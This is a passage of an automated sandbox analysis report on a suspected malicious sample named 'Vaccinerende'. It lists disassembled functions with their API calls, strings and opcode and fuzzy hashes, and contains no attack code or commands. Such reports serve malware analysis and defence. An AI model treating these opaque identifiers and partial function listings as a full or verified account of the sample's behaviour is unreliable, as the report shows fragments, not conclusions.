                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 290601579-0
                                            • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                            • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                            Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                            Download Yara Rule
                                            APIs
                                            • memchr.MSVCRT ref: 00444EBF
                                            • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                            • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                            • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                            • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                            • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                            • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                            • memset.MSVCRT ref: 0044505E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memchrmemset
                                            • String ID: PD$PD
                                            • API String ID: 1581201632-2312785699
                                            • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                            • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                            Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                            • GetDC.USER32(00000000), ref: 00409F6E
                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                            • GetParent.USER32(?), ref: 00409FA5
                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                            • String ID:
                                            • API String ID: 2163313125-0
                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                            Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$wcslen
                                            • String ID:
                                            • API String ID: 3592753638-3916222277
                                            • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                            • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                            Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040A47B
                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                            • wcslen.MSVCRT ref: 0040A4BA
                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                            • wcslen.MSVCRT ref: 0040A4E0
                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpywcslen$_snwprintfmemset
                                            • String ID: %s (%s)$YV@
                                            • API String ID: 3979103747-598926743
                                            • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                            • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                            Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                            • wcslen.MSVCRT ref: 0040A6B1
                                            • wcscpy.MSVCRT ref: 0040A6C1
                                            • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                            • wcscpy.MSVCRT ref: 0040A6DB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                            • String ID: Unknown Error$netmsg.dll
                                            • API String ID: 2767993716-572158859
                                            • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                            • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                            Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                            • wcscpy.MSVCRT ref: 0040DAFB
                                            • wcscpy.MSVCRT ref: 0040DB0B
                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                            • API String ID: 3176057301-2039793938
                                            • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                            • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                            Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • too many attached databases - max %d, xrefs: 0042F64D
                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                            • out of memory, xrefs: 0042F865
                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                            • database %s is already in use, xrefs: 0042F6C5
                                            • database is already attached, xrefs: 0042F721
                                            • unable to open database: %s, xrefs: 0042F84E
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                            • API String ID: 1297977491-2001300268
                                            • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                            • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                            Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                            • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                            • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                            • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                            • String ID: ($d
                                            • API String ID: 1140211610-1915259565
                                            • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                            • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                            Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                            • GetLastError.KERNEL32 ref: 004178FB
                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$ErrorLastLockSleepUnlock
                                            • String ID:
                                            • API String ID: 3015003838-0
                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                            Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00407E44
                                            • memset.MSVCRT ref: 00407E5B
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                            • wcscpy.MSVCRT ref: 00407F10
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                            • String ID:
                                            • API String ID: 59245283-0
                                            • Opcode ID: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                            • Opcode Fuzzy Hash: 5e520accdd45059f4d080cd8d67ab72c1dc8c36b7959bb75ad43466fad0b9107
                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                            Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                            • GetLastError.KERNEL32 ref: 0041855C
                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                            • GetLastError.KERNEL32 ref: 0041858E
                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                            • free.MSVCRT ref: 004185AC
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$AttributesDeleteErrorLastSleep$free
                                            • String ID:
                                            • API String ID: 2802642348-0
                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                            Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                            • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                            • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                            • API String ID: 3510742995-3273207271
                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                            • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                            Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                            Download Yara Rule
                                            APIs
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                            • memset.MSVCRT ref: 00413ADC
                                            • memset.MSVCRT ref: 00413AEC
                                              • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                            • memset.MSVCRT ref: 00413BD7
                                            • wcscpy.MSVCRT ref: 00413BF8
                                            • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$CloseHandleOpenProcess
                                            • String ID: 3A
                                            • API String ID: 3300951397-293699754
                                            • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                            • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                            • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                            • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                            Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                            • wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                              • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                            • wcslen.MSVCRT ref: 0040D1D3
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                            • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                            • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                              • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                            • String ID: strings
                                            • API String ID: 3166385802-3030018805
                                            • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                            • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                            • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                            • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
